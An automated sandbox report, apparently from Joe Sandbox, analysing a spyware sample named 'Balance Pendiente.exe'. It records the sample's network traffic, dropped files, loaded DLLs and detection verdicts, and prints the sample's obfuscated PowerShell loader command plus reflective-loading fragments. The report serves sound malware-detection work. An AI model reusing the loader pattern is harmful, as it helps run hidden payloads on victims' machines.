            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
            Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021DF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021E3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBdq
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49905 version: TLS 1.2
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00404F90 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F90

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Balance Pendiente.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exeJump to dropped file
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_004030B8 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030B8
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_004061410_2_00406141
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_004047CF0_2_004047CF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FFBED61_2_06FFBED6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDD2786_2_02EDD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ED538A6_2_02ED538A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDC1476_2_02EDC147
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDC7526_2_02EDC752
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDC4686_2_02EDC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDCA226_2_02EDCA22
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDE9886_2_02EDE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ED3E176_2_02ED3E17
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDCFC26_2_02EDCFC2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDCCF26_2_02EDCCF2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ED71186_2_02ED7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02ED2A776_2_02ED2A77
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02EDF9746_2_02EDF974
            Source: Balance Pendiente.exeStatic PE information: invalid certificate
            Source: Balance Pendiente.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/15@5/5
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00404293 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404293
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile created: C:\Users\user\AppData\Local\Temp\nsr1481.tmpJump to behavior
            Source: Balance Pendiente.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Balance Pendiente.exeVirustotal: Detection: 44%
            Source: Balance Pendiente.exeReversingLabs: Detection: 37%
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile read: C:\Users\user\Desktop\Balance Pendiente.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Balance Pendiente.exe "C:\Users\user\Desktop\Balance Pendiente.exe"
            Source: C:\Users\user\Desktop\Balance Pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Balance Pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bortvejredes $Systemisable $Miljstttes), (Fiskeriterritoriets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bagatelgrnse = [AppDomain]::CurrentDomain.Get
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spiritualty)), $Kadaverdisciplins).DefineDynamicModule($Agribusiness, $false).DefineType($Auricyanic, $Tenuis, [System.MulticastDelega
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FF98CF push 5F5E6BB2h; retn 0004h1_2_06FF98CA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FF880C push ss; retf 1_2_06FF880D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FF4BDA push edx; retf 1_2_06FF4BDB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FF4B7B push edx; retf 1_2_06FF4B7C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_06FFAF5B pushad ; ret 1_2_06FFAF71
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08EE28B9 push 8BD38B50h; iretd 1_2_08EE28BE

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) The email domain 'Tredjeprmier.Sh' is extremely suspicious - .sh is a Somalia TLD and the domain name appears randomly generated. 2) Organization name 'Breweries' is generic and doesn't match a legitimate corporate entity. 3) The OU field contains seemingly random Danish/Germanic words that make no sense together. 4) Self-signed certificate where issuer matches subject exactly. 5) Certificate validation failed with untrusted root error. 6) Large time gap between compilation date (2013) and certificate dates (2024-2025) suggests possible timestamp manipulation. 7) The combination of a US location with Danish/Germanic organization details and Somalian email domain creates an inconsistent and suspicious identity pattern typical of malware.
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile created: C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
